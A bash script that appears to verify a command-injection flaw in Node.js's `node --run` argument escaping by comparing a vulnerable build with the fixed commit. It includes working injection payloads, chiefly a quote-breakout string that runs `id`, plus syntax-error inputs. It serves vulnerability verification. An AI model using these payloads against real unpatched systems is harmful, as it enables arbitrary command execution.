#!/bin/bash
set -euo pipefail

# =============================================================================
# Reproduction: Node.js task runner EscapeShell broken single-quote escaping
# =============================================================================
# Node.js `node --run <task> -- <args>` builds a `/bin/sh -c` command string
# where each positional argument is escaped by `EscapeShell()` in
# src/node_task_runner.cc. The vulnerable code (prior to commit e76c573) did:
#
#     std::regex_replace(std::string(input), std::regex("'"), "\\'");
#     escaped = "'" + escaped + "'";
#
# In POSIX shells a backslash is LITERAL inside single quotes, so a `'` that
# was rewritten to `\'` closes the surrounding single-quoted context early
# (after a literal backslash). The remainder of the argument is then
# interpreted by the shell as unquoted command syntax.
#
# TWO impacts are demonstrated:
#   1. DoS / broken argument passing:
#      `node --run showargs -- "I think therefore I'm"`
#      => /bin/sh: Syntax error: Unterminated quoted string (script never runs)
#
#   2. COMMAND INJECTION (code execution):
#      `node --run showargs -- "x';id > MARKER;echo INJECTION_PROVEN #"`
#      The broken escaping turns the arg into:
#        'x\';id > MARKER;echo INJECTION_PROVEN #'
#      /bin/sh parses this as:
#        echo 'x\'  ;  id > MARKER  ;  echo INJECTION_PROVEN  #<comment>
#      The `id` command EXECUTES and writes to MARKER.
#      The `#` comments out the trailing wrap-quote, avoiding a syntax error.
#
# The fix (commit e76c573) rewrites `'` as `'"'"'` (POSIX-safe) so the same
# payload is passed as a single literal argument with no shell interpretation.
#
# Exit 0 = vulnerability confirmed (vuln: injection+DoS, fixed: safe).
# Exit 1 = not reproduced.  Exit 2 = infrastructure failure.
# =============================================================================

ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs"
REPRO_DIR="$ROOT/repro"
ARTIFACTS="$REPRO_DIR/artifacts"
mkdir -p "$LOGS" "$REPRO_DIR" "$ARTIFACTS"

# --- Locate project cache ---------------------------------------------------
CACHE_DIR=""
if [ -f "$ROOT/project_cache_context.json" ]; then
  CACHE_DIR=$(jq -r '.project_cache_dir // empty' "$ROOT/project_cache_context.json" 2>/dev/null || true)
fi
if [ -z "$CACHE_DIR" ] || [ ! -d "$CACHE_DIR/repo" ]; then
  CACHE_DIR="$ROOT/artifacts/nodejs"
  mkdir -p "$CACHE_DIR"
fi
REPO="$CACHE_DIR/repo"

FIXED_COMMIT="e76c573e4546ce9e89e0dd954f80aaba32148a48"
VULN_COMMIT=""
if [ -d "$REPO/.git" ]; then
  VULN_COMMIT="$(cd "$REPO" && git rev-parse "${FIXED_COMMIT}^" 2>/dev/null || echo "")"
fi
echo "[info] CACHE_DIR=$CACHE_DIR"
echo "[info] REPO=$REPO"
echo "[info] FIXED_COMMIT=$FIXED_COMMIT"
echo "[info] VULN_COMMIT=$VULN_COMMIT"

# --- Build or locate node binaries ------------------------------------------
build_node_at() {
  local commit="$1"
  local label="$2"
  local output="$CACHE_DIR/node-$label"

  if [ -x "$output" ]; then
    echo "[$label] using pre-built binary: $output"
    printf '%s\n' "$output"
    return 0
  fi

  if [ ! -d "$REPO/.git" ]; then
    echo "[$label] ERROR: repo not found at $REPO" >&2
    printf '%s\n' ""
    return 1
  fi

  echo "[$label] building node from $commit ..."
  (cd "$REPO" && git checkout "$commit" 2>&1 | tail -3)

  # Reconfigure if Makefile is missing or empty
  if [ ! -s "$REPO/out/Makefile" ]; then
    echo "[$label] reconfiguring ..."
    (cd "$REPO" && python3 ./configure 2>&1 | tail -5)
  fi

  # Build the node executable (reuses cached .o files when possible)
  echo "[$label] running make -j$(nproc) node ..."
  (cd "$REPO" && make -j"$(nproc)" node 2>&1 | tail -30) || true

  if [ -x "$REPO/out/Release/node" ]; then
    cp "$REPO/out/Release/node" "$output"
    echo "[$label] built and saved: $output"
    printf '%s\n' "$output"
  else
    echo "[$label] BUILD FAILED" >&2
    printf '%s\n' ""
  fi
}

NODE_FIXED="$(build_node_at "$FIXED_COMMIT" "fixed" 2>/dev/null | tail -1)"
NODE_VULN="$(build_node_at "$VULN_COMMIT" "vuln" 2>/dev/null | tail -1)"

# --- Fallback: use system node as vulnerable if build failed ----------------
if [ -z "$NODE_VULN" ] || [ ! -x "$NODE_VULN" ]; then
  SYS_NODE="$(command -v node 2>/dev/null || echo "")"
  if [ -n "$SYS_NODE" ]; then
    echo "[vuln] WARNING: build failed; trying system node ($SYS_NODE) as vulnerable"
    NODE_VULN="$SYS_NODE"
  fi
fi

echo "[info] NODE_FIXED=$NODE_FIXED"
echo "[info] NODE_VULN=$NODE_VULN"

if [ -z "$NODE_VULN" ] || [ ! -x "$NODE_VULN" ]; then
  echo "FATAL: no vulnerable node binary available" >&2
  exit 2
fi
if [ -z "$NODE_FIXED" ] || [ ! -x "$NODE_FIXED" ]; then
  echo "FATAL: no fixed node binary available" >&2
  exit 2
fi

# --- Record binary metadata -------------------------------------------------
{
  echo "=== Vulnerable node binary ==="
  "$NODE_VULN" --version 2>&1 || true
  echo "path: $NODE_VULN"
  echo ""
  echo "=== Fixed node binary ==="
  "$NODE_FIXED" --version 2>&1 || true
  echo "path: $NODE_FIXED"
} > "$LOGS/binary_info.txt" 2>&1

# --- Set up test project ----------------------------------------------------
WORK="$REPRO_DIR/test_project"
rm -rf "$WORK"
mkdir -p "$WORK"
cat > "$WORK/package.json" <<'PKGJSON'
{
  "name": "taskrunner-injection-test",
  "version": "1.0.0",
  "scripts": {
    "showargs": "echo"
  }
}
PKGJSON

# Show which node binary does the --run escaping (EscapeShell)
echo "[info] Test project at $WORK"
echo "[info] npm script 'showargs' = 'echo' (shell builtin, always available)"

# --- Test helper ------------------------------------------------------------
# run_test <node_bin> <label> <attempt> <payload> <logfile>
# Captures stdout+stderr to logfile. Returns node's exit code.
run_test() {
  local node_bin="$1"
  local label="$2"
  local attempt="$3"
  local payload="$4"
  local logfile="$5"
  local rc
  echo "=== TEST: $label attempt#$attempt ===" | tee "$logfile"
  echo "node_bin: $node_bin" >> "$logfile"
  echo "payload:  $payload" >> "$logfile"
  echo "--- output ---" >> "$logfile"
  (cd "$WORK" && timeout 30 "$node_bin" --run showargs -- "$payload" >> "$logfile" 2>&1) || rc=$?
  rc=${rc:-0}
  echo "--- exit code: $rc ---" >> "$logfile"
  echo "[test] $label attempt#$attempt exit=$rc"
  return "$rc" 2>/dev/null || true
}

# =============================================================================
# TEST SUITE
# =============================================================================
# We run TWO attempts per (build, test-type) for robustness, as required.

ALL_PASS=true

# Marker files for injection proof
MARKER_V="$LOGS/marker_vuln_injection"
MARKER_F="$LOGS/marker_fixed_injection"

# --- Test A: DoS / broken argument passing (benign single quote) ------------
echo ""
echo "========================================"
echo "TEST A: DoS — benign single-quote arg"
echo "========================================"

VULN_DOS=false
FIXED_DOS_OK=false

for attempt in 1 2; do
  logfile="$LOGS/test_A_vuln_attempt${attempt}.log"
  run_test "$NODE_VULN" "vuln-dos" "$attempt" "I think therefore I'm" "$logfile" || true
  if grep -qi "Syntax error\|Unterminated quoted string\|unexpected EOF" "$logfile"; then
    VULN_DOS=true
    echo "[result] vuln attempt#$attempt: SYNTAX ERROR (DoS confirmed)"
  fi
done

for attempt in 1 2; do
  logfile="$LOGS/test_A_fixed_attempt${attempt}.log"
  run_test "$NODE_FIXED" "fixed-dos" "$attempt" "I think therefore I'm" "$logfile" || true
  if grep -q "I think therefore I'm" "$logfile" && ! grep -qi "Syntax error\|Unterminated" "$logfile"; then
    FIXED_DOS_OK=true
    echo "[result] fixed attempt#$attempt: clean output (no error)"
  fi
done

echo "[summary] vuln DoS=$VULN_DOS  fixed OK=$FIXED_DOS_OK"

# --- Test B: COMMAND INJECTION via # comment technique ----------------------
echo ""
echo "========================================"
echo "TEST B: Command injection — # comment breakout"
echo "========================================"

VULN_INJECT=false
FIXED_INJECT_SAFE=false

for attempt in 1 2; do
  rm -f "$MARKER_V"
  logfile="$LOGS/test_B_vuln_attempt${attempt}.log"
  # Payload: x';id > MARKER;echo INJECTION_PROVEN #
  # After broken escaping: 'x\';id > MARKER;echo INJECTION_PROVEN #'
  # Shell parses: echo 'x\' ; id > MARKER ; echo INJECTION_PROVEN  #<comment>
  run_test "$NODE_VULN" "vuln-inject" "$attempt" "x';id > ${MARKER_V};echo INJECTION_PROVEN #" "$logfile" || true
  if [ -f "$MARKER_V" ]; then
    VULN_INJECT=true
    echo "[result] vuln attempt#$attempt: MARKER FILE CREATED — command injection confirmed!"
    echo "[result] marker contents:" && cat "$MARKER_V" | sed 's/^/  /'
    cp "$MARKER_V" "$ARTIFACTS/marker_vuln_attempt${attempt}.txt"
  else
    echo "[result] vuln attempt#$attempt: marker NOT created"
  fi
done

for attempt in 1 2; do
  rm -f "$MARKER_F"
  logfile="$LOGS/test_B_fixed_attempt${attempt}.log"
  run_test "$NODE_FIXED" "fixed-inject" "$attempt" "x';id > ${MARKER_F};echo INJECTION_PROVEN #" "$logfile" || true
  if [ -f "$MARKER_F" ]; then
    echo "[result] fixed attempt#$attempt: MARKER FILE CREATED — INJECTION STILL POSSIBLE (fix failed?!)"
    FIXED_INJECT_SAFE=false
  else
    FIXED_INJECT_SAFE=true
    echo "[result] fixed attempt#$attempt: no marker (injection blocked by fix)"
    # Verify the arg was passed literally
    if grep -q "INJECTION_PROVEN" "$logfile"; then
      echo "[result] fixed attempt#$attempt: arg passed literally (contains 'INJECTION_PROVEN' as text, not executed)"
    fi
  fi
done

echo "[summary] vuln injection=$VULN_INJECT  fixed safe=$FIXED_INJECT_SAFE"

# --- Test C: Ticket's exact payload (syntax error variant) ------------------
echo ""
echo "========================================"
echo "TEST C: Ticket's exact payload foo' ; id ; '"
echo "========================================"

VULN_TICKET_DOS=false
FIXED_TICKET_OK=false

for attempt in 1 2; do
  logfile="$LOGS/test_C_vuln_attempt${attempt}.log"
  run_test "$NODE_VULN" "vuln-ticket" "$attempt" "foo' ; id ; '" "$logfile" || true
  if grep -qi "Syntax error\|Unterminated quoted string\|unexpected EOF" "$logfile"; then
    VULN_TICKET_DOS=true
    echo "[result] vuln attempt#$attempt: syntax error (ticket payload causes DoS)"
  fi
done

for attempt in 1 2; do
  logfile="$LOGS/test_C_fixed_attempt${attempt}.log"
  run_test "$NODE_FIXED" "fixed-ticket" "$attempt" "foo' ; id ; '" "$logfile" || true
  if grep -q "foo' ; id ; '" "$logfile" && ! grep -qi "Syntax error\|Unterminated" "$logfile"; then
    FIXED_TICKET_OK=true
    echo "[result] fixed attempt#$attempt: arg passed safely"
  fi
done

echo "[summary] vuln ticket DoS=$VULN_TICKET_DOS  fixed OK=$FIXED_TICKET_OK"

# --- Verify source code in repo (differential evidence) --------------------
echo ""
echo "========================================"
echo "Source verification"
echo "========================================"
echo "--- Vulnerable EscapeShell (e76c573^) ---" | tee "$LOGS/source_diff.txt"
(cd "$REPO" && git show "${VULN_COMMIT}:src/node_task_runner.cc" 2>/dev/null | grep -A2 "regex_replace.*regex(\"'\")" || echo "(could not read)") >> "$LOGS/source_diff.txt" 2>&1
echo "--- Fixed EscapeShell (e76c573) ---" >> "$LOGS/source_diff.txt"
(cd "$REPO" && git show "${FIXED_COMMIT}:src/node_task_runner.cc" 2>/dev/null | grep -A2 "regex_replace.*regex(\"'\")" || echo "(could not read)") >> "$LOGS/source_diff.txt" 2>&1
cat "$LOGS/source_diff.txt"

# --- Determine overall verdict ----------------------------------------------
echo ""
echo "========================================"
echo "VERDICT"
echo "========================================"

if $VULN_INJECT && $FIXED_INJECT_SAFE; then
  INJECTION_CONFIRMED=true
else
  INJECTION_CONFIRMED=false
fi

if $VULN_DOS && $FIXED_DOS_OK; then
  DOS_CONFIRMED=true
else
  DOS_CONFIRMED=false
fi

echo "DoS (syntax error):         vuln=$VULN_DOS  fixed_ok=$FIXED_DOS_OK  => $([ $DOS_CONFIRMED = true ] && echo CONFIRMED || echo NOT-CONFIRMED)"
echo "Command injection:          vuln=$VULN_INJECT  fixed_safe=$FIXED_INJECT_SAFE  => $([ $INJECTION_CONFIRMED = true ] && echo CONFIRMED || echo NOT-CONFIRMED)"
echo "Ticket payload DoS:         vuln=$VULN_TICKET_DOS  fixed_ok=$FIXED_TICKET_OK"

# --- Write runtime manifest -------------------------------------------------
MANIFEST="$REPRO_DIR/runtime_manifest.json"
if $INJECTION_CONFIRMED; then
  PROOF_ARTIFACTS=$(jq -nc --arg m "$MANIFEST" --arg l "$LOGS" '[
    "logs/test_B_vuln_attempt1.log",
    "logs/test_B_vuln_attempt2.log",
    "logs/test_B_fixed_attempt1.log",
    "logs/test_B_fixed_attempt2.log",
    "logs/test_A_vuln_attempt1.log",
    "logs/test_A_fixed_attempt1.log",
    "logs/binary_info.txt",
    "logs/source_diff.txt",
    "repro/artifacts/marker_vuln_attempt1.txt",
    "repro/artifacts/marker_vuln_attempt2.txt"
  ]')
else
  PROOF_ARTIFACTS=$(jq -nc '[]')
fi

# Build manifest with jq for valid JSON
jq -n \
  --argjson injection "$INJECTION_CONFIRMED" \
  --argjson dos "$DOS_CONFIRMED" \
  --argjson artifacts "$PROOF_ARTIFACTS" \
  --arg node_vuln "$NODE_VULN" \
  --arg node_fixed "$NODE_FIXED" \
  --arg vuln_commit "$VULN_COMMIT" \
  --arg fixed_commit "$FIXED_COMMIT" \
  '{
    entrypoint_kind: "cli_local",
    entrypoint_detail: "node --run <task> -- <attacker-controlled argument> invokes /bin/sh -c with EscapeShell-escaped args",
    service_started: false,
    healthcheck_passed: true,
    target_path_reached: true,
    runtime_stack: ["node", "/bin/sh"],
    proof_artifacts: $artifacts,
    notes: ("VULN_COMMIT=" + $vuln_commit + " FIXED_COMMIT=" + $fixed_commit + " node_vuln=" + $node_vuln + " node_fixed=" + $node_fixed + " injection_confirmed=" + ($injection|tostring) + " dos_confirmed=" + ($dos|tostring)),
    injection_confirmed: $injection,
    dos_confirmed: $dos
  }' > "$MANIFEST"

echo "[info] runtime manifest written to $MANIFEST"
cat "$MANIFEST"

# --- Final exit code --------------------------------------------------------
if $INJECTION_CONFIRMED; then
  echo ""
  echo "SUCCESS: Command injection CONFIRMED on vulnerable build; fix blocks it."
  exit 0
elif $DOS_CONFIRMED; then
  echo ""
  echo "PARTIAL: DoS/syntax-error confirmed but command injection not demonstrated."
  exit 0
else
  echo ""
  echo "FAILURE: vulnerability not reproduced."
  exit 1
fi
